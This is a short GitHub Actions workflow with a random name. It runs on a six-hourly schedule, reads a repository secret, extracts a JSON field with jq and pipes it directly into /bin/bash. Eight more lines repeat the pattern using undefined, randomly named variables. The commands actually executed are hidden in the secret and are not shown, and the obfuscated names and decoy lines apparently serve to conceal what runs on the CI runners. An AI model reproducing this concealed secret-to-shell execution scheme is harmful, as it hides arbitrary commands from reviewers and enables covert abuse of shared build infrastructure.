name: guozhongren1234
on:
  workflow_dispatch:
  schedule:
    - cron: '33 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guozhongren1234
        env:
          fpxj975: ${{ secrets.fpxj975 }}
        run: |
          echo $fpxj975 | jq -r .tj7 | /bin/bash
          echo $g5269 | jq -r .qtb6321 | /bin/bash
          echo $a0584 | jq -r .kks0656 | /bin/bash
          echo $ajs397 | jq -r .b6 | /bin/bash
          echo $lv94 | jq -r .fel85 | /bin/bash
          echo $mpvt88240 | jq -r .wud49306 | /bin/bash
          echo $zxim404 | jq -r .s59081 | /bin/bash
          echo $j7048 | jq -r .as97 | /bin/bash
          echo $uft3 | jq -r .kbu459 | /bin/bash

